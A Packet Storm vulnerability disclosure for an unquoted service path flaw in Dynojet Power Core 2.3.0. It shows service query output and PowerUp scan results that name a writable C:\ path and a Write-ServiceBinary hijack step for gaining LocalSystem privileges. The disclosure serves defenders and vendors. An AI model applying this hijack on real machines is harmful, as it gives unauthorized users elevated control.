exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Dynojet Power Core 2.3.0 Unquoted Service Path

Dynojet Power Core 2.3.0 Unquoted Service Path
Posted Nov 2, 2021
Authored by Pedro Sousa Rodrigues

Dynojet Power Core version 2.3.0 suffers from an unquoted service path vulnerability.

tags | exploit
SHA-256 | e405648225214fe6aeae81bc56b6ea13066748ad49bc03e53362bda9f9d2335c

Dynojet Power Core 2.3.0 Unquoted Service Path

Change Mirror Download
# Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path
# Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)
# Version: 2.3.0 (Build 303)
# Date: 30.10.2021
# Vendor Homepage: https://www.dynojet.com/
# Software Link: https://docs.dynojet.com/Document/18762
# Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)

SERVICE_NAME: DJ.UpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DJ.UpdateService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
PS C:\Users\Developer> Get-UnquotedService


ServiceName : DJ.UpdateService
Path : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users;
Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart : True
Name : DJ.UpdateService

ServiceName : DJ.UpdateService
Path : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart : True
Name : DJ.UpdateService

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close